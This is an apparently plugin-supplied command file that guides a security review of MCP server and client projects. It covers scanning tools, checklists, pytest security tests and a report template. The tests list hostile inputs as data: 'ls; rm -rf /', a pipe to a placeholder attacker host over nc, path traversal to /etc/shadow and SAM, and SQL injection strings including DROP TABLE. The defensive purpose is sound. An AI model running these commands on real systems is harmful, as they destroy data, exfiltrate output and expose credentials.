gh-phaezer-claude-mkt-plugins-mcp/commands/review-mcp-security.md

description, argument-hint

description	argument-hint
Security review of MCP server or client	Path to MCP project for security review

Security Review of MCP Implementation

Perform comprehensive security review of an MCP server or client implementation.

Usage

/review-mcp-security [project-path]

Arguments:

• project-path: Path to MCP project directory (optional, defaults to current directory)

Examples:

/review-mcp-security
/review-mcp-security ./my-mcp-server
/review-mcp-security ../production-mcp-client

What This Command Does

This command performs a thorough security review of an MCP implementation, checking for:

• Input validation vulnerabilities
• Path traversal issues
• Command/SQL injection risks
• API key exposure
• Information disclosure
• Dependency vulnerabilities
• Rate limiting issues
• Transport security

Workflow Steps

Step 1: Detect Project Details

Analyze the project to gather information:

1. Type: Server or Client?
2. Language: Python or TypeScript?
3. External Integrations: APIs, databases, filesystems?
4. Authentication: How are credentials managed?
5. Transport: stdio, SSE, or both?

Step 2: Launch Security Reviewer Agent

Use the Task tool to launch mcp-security-reviewer agent.

Agent Task:

Perform comprehensive security review of MCP [server/client]:

Project: [project name]
Location: [project path]
Language: [Python/TypeScript]
Type: [Server/Client]

Review Areas:
1. Input Validation
   - Tool parameter validation
   - Resource URI parsing
   - File path handling
   - SQL query construction (if applicable)
   - Command execution parameters

2. Authentication & Authorization
   - API key management
   - Token storage and handling
   - Permission checking
   - Rate limiting

3. Data Access Controls
   - File system access restrictions
   - Database query permissions
   - API endpoint access
   - Resource whitelisting

4. Information Disclosure
   - Error messages
   - Log output
   - Stack traces
   - Debug information

5. Dependency Security
   - Known vulnerabilities
   - Outdated packages
   - Malicious packages

6. Transport Security (if SSE)
   - HTTPS usage
   - Certificate validation
   - Man-in-the-middle protection

Deliverables:
- Complete security review report
- Vulnerability list with severity (Critical/High/Medium/Low)
- Specific code locations
- Remediation recommendations with code examples
- Security checklist results

Step 3: Run Automated Security Scans

Python Security Scanning:

# Install security tools
pip install bandit safety pip-audit

# Bandit - code security scanner
bandit -r src/ -f json -o bandit-report.json

# Safety - dependency vulnerability checker
safety check --json > safety-report.json

# pip-audit - check for vulnerable dependencies
pip-audit --format json > pip-audit-report.json

TypeScript Security Scanning:

# npm audit - check for vulnerable dependencies
npm audit --json > npm-audit-report.json

# Snyk - comprehensive security scanning
npm install -g snyk
snyk auth
snyk test --json > snyk-report.json

# ESLint with security plugin
npm install -g eslint eslint-plugin-security
eslint --ext .ts src/ --format json > eslint-security-report.json

Step 4: Manual Code Review

Review critical security-sensitive code areas:

For Servers:

1. Tool Input Validation:

# Check each tool for proper validation
@mcp.tool()
def read_file(path: str) -> dict:
    # LOOK FOR:
    # - Path sanitization
    # - Base directory restriction
    # - Input length limits
    # - Character whitelisting

2. Command Execution:

# Check for shell=True usage (DANGEROUS)
subprocess.run(command, shell=True)  # ❌ VULNERABLE

# Should use array and shell=False
subprocess.run([cmd, arg1, arg2], shell=False)  # ✓ SAFE

3. SQL Queries:

# Check for string concatenation (VULNERABLE)
query = f"SELECT * FROM users WHERE id = {user_id}"  # ❌

# Should use parameterized queries
query = "SELECT * FROM users WHERE id = ?"  # ✓
db.execute(query, (user_id,))

4. API Key Management:

# Check for hardcoded secrets (VULNERABLE)
API_KEY = "sk-1234567890"  # ❌

# Should use environment variables
API_KEY = os.getenv("API_KEY")  # ✓

For Clients:

1. Server Connection Validation:
2. Tool Parameter Sanitization:
3. Resource URI Validation:
4. Credential Storage:

Step 5: Check Security Best Practices

Verify implementation of security best practices:

Input Validation Checklist:

• All tool parameters validated
• Type checking enforced (Pydantic/Zod)
• Input length limits set
• Character whitelisting for sensitive inputs
• Regex patterns validated

File System Security:

• Base directory restrictions enforced
• Path traversal prevention implemented
• Symlink attack prevention
• File type validation
• Size limits enforced

Command Execution Security:

• shell=False always used
• Command whitelist implemented
• Argument sanitization
• Timeout limits set

Database Security:

• Parameterized queries only
• Read-only connections where possible
• Query timeout limits
• Connection pooling secure

API Security:

• Credentials in environment variables
• No secrets in logs
• HTTPS only for external APIs
• Certificate validation enabled
• Timeout limits set

Error Handling:

• No stack traces to users
• Generic error messages
• Detailed errors logged securely
• Error correlation IDs

Rate Limiting:

• Per-tool rate limits
• Per-user rate limits (if applicable)
• Global rate limits
• Backoff strategies

Logging:

• No credentials logged
• Sensitive data redacted
• Security events logged
• Log rotation configured

Step 6: Dependency Vulnerability Assessment

Analyze all dependencies for known vulnerabilities:

Python:

# Check all dependencies
safety check --full-report

# Check specific package
pip show package-name

TypeScript:

# Check all dependencies
npm audit

# Fix automatically where possible
npm audit fix

# Check for major updates
npm outdated

Create Dependency Report:

Package	Current	Vulnerability	Severity	Fixed In	Action
requests	2.25.0	CVE-2023-xxxxx	High	2.31.0	Update
axios	0.21.1	CVE-2021-3749	Critical	0.21.2	Update

Step 7: Test Security Scenarios

Run security-specific tests:

import pytest

class TestSecurityScenarios:
    """Security-focused test cases"""

    def test_path_traversal_prevention(self):
        """Attempt path traversal attacks"""
        malicious_paths = [
            "../../../etc/passwd",
            "..\\..\\..\\windows\\system32\\config\\sam",
            "/etc/shadow",
            "C:\\Windows\\System32\\config\\SAM"
        ]

        for path in malicious_paths:
            result = mcp.call_tool("read_file", {"path": path})
            assert result["success"] is False
            assert "access denied" in result["error"].lower()

    def test_command_injection_prevention(self):
        """Attempt command injection"""
        malicious_commands = [
            "ls; rm -rf /",
            "ls && cat /etc/passwd",
            "ls | nc attacker.com 4444"
        ]

        for cmd in malicious_commands:
            result = mcp.call_tool("run", {"command": cmd})
            assert result["success"] is False

    def test_sql_injection_prevention(self):
        """Attempt SQL injection"""
        malicious_inputs = [
            "admin' OR '1'='1",
            "'; DROP TABLE users; --",
            "admin' UNION SELECT password FROM users--"
        ]

        for username in malicious_inputs:
            result = mcp.call_tool("search_user", {"username": username})
            # Should not return unauthorized data
            assert result.get("users", []) == []

    def test_no_secrets_in_errors(self):
        """Ensure secrets not exposed in errors"""
        result = mcp.call_tool("api_call_with_token", {"endpoint": "/invalid"})

        # Check error doesn't contain API key
        error_str = str(result).lower()
        assert "api_key" not in error_str
        assert "token" not in error_str
        assert "secret" not in error_str

    def test_rate_limiting(self):
        """Verify rate limiting works"""
        # Make many requests rapidly
        results = []
        for i in range(150):
            result = mcp.call_tool("expensive_operation", {})
            results.append(result)

        # Some requests should be rate limited
        rate_limited = [r for r in results if "rate limit" in r.get("error", "").lower()]
        assert len(rate_limited) > 0

Step 8: Generate Security Report

Create comprehensive security report:

# Security Review Report

**Project**: [project name]
**Version**: [version]
**Review Date**: [date]
**Reviewer**: Security Review Agent

## Executive Summary

[Brief overview of security posture]

**Overall Risk Level**: [Low/Medium/High/Critical]

**Summary**:
- Critical Issues: [count]
- High Severity: [count]
- Medium Severity: [count]
- Low Severity: [count]
- Informational: [count]

## Critical Vulnerabilities (Fix Immediately)

### 1. Path Traversal in read_file Tool

**Severity**: Critical
**CWE**: CWE-22 (Path Traversal)
**Location**: `src/tools/filesystem.py:45`

**Description**:
The `read_file` tool does not validate file paths, allowing attackers to read arbitrary files on the system.

**Vulnerable Code**:
```python
@mcp.tool()
def read_file(path: str) -> dict:
    with open(path, 'r') as f:
        return {"content": f.read()}

Proof of Concept:

read_file(path="../../../etc/passwd")

Impact: Attackers can read sensitive files including:

• /etc/passwd, /etc/shadow
• SSH keys
• Application secrets
• Database credentials

Remediation:

from pathlib import Path

BASE_DIR = Path("/safe/data/directory").resolve()

@mcp.tool()
def read_file(path: str) -> dict:
    try:
        # Resolve and validate path
        file_path = (BASE_DIR / path).resolve()
        file_path.relative_to(BASE_DIR)  # Raises ValueError if outside BASE_DIR

        with open(file_path, 'r') as f:
            return {"success": True, "content": f.read()}

    except ValueError:
        return {"success": False, "error": "Access denied"}
    except Exception as e:
        return {"success": False, "error": "Read failed"}

[Continue for all critical issues...]

High Severity Issues

[List all high severity issues with similar format]

Medium Severity Issues

[List all medium severity issues]

Low Severity Issues

[List all low severity issues]

Dependency Vulnerabilities

Package	Version	Vulnerability	Severity	Fixed Version
[package]	[current]	[CVE-ID]	[severity]	[fixed]

Security Checklist

Input Validation

• Tool parameters validated ❌
• Type checking enforced ✓
• Length limits set ✓
• Character whitelisting ❌

Authentication & Authorization

• API keys in environment ❌ (hardcoded in config.py)
• No secrets in code ❌
• Rate limiting implemented ✓
• Token validation ✓

Data Access

• File system restricted ❌ (CRITICAL)
• SQL injection prevented ✓
• Command injection prevented ❌ (HIGH)

Error Handling

• No stack traces exposed ✓
• Generic error messages ✓
• Secrets not in logs ⚠️ (needs verification)

Recommendations

Immediate Actions (Within 1 Week)

1. Fix path traversal in read_file tool
2. Remove hardcoded API keys - move to environment variables
3. Fix command injection in run_command tool
4. Update vulnerable dependencies:
   • requests: 2.25.0 → 2.31.0
   • axios: 0.21.1 → 1.6.0

Short Term (Within 1 Month)

1. Implement comprehensive input validation for all tools
2. Add rate limiting to all expensive operations
3. Implement security logging for audit trail
4. Add automated security scanning to CI/CD

Long Term

1. Regular security audits (quarterly)
2. Automated dependency updates
3. Security training for development team
4. Penetration testing

Testing Recommendations

Add these security tests:

# tests/security/test_security.py
def test_path_traversal():
    """Verify path traversal prevention"""

def test_command_injection():
    """Verify command injection prevention"""

def test_no_hardcoded_secrets():
    """Scan codebase for hardcoded secrets"""

Compliance

• OWASP Top 10 addressed
• CWE Top 25 reviewed
• Secure coding practices followed
• Security documentation present

Conclusion

[Overall assessment and required actions]

Next Review: [recommended date]

### Step 9: Provide Remediation Guidance

For each vulnerability, provide:
1. **Detailed explanation** of the issue
2. **Severity rating** with justification
3. **Working code example** showing the fix
4. **Testing recommendations**
5. **Additional resources**

### Step 10: Generate Summary

✓ Security Review Complete: [project-name]

Security Assessment: Overall Risk: HIGH ⚠️ Critical Issues: 2 High Severity: 3 Medium Severity: 5 Low Severity: 8

Top Issues to Fix:

1. [CRITICAL] Path traversal in read_file tool
2. [CRITICAL] Hardcoded API keys in config.py
3. [HIGH] Command injection in run_command
4. [HIGH] SQL injection in search_users
5. [HIGH] Information disclosure in error messages

Dependency Issues:

• 3 packages with known vulnerabilities
• 2 packages severely outdated

Recommendations: ⚠️ Fix critical issues immediately before deployment ⚠️ Update all vulnerable dependencies ✓ Add security tests to test suite ✓ Implement automated security scanning in CI/CD

Detailed report: ./security-report.md Scan results: ./security-scans/

## Success Criteria

- [ ] Security review agent completed analysis
- [ ] Automated security scans run
- [ ] Manual code review performed
- [ ] Security test cases created
- [ ] Vulnerabilities documented with severity
- [ ] Remediation guidance provided
- [ ] Security report generated
- [ ] Dependencies checked for vulnerabilities

This command ensures MCP implementations follow security best practices and are safe for production use.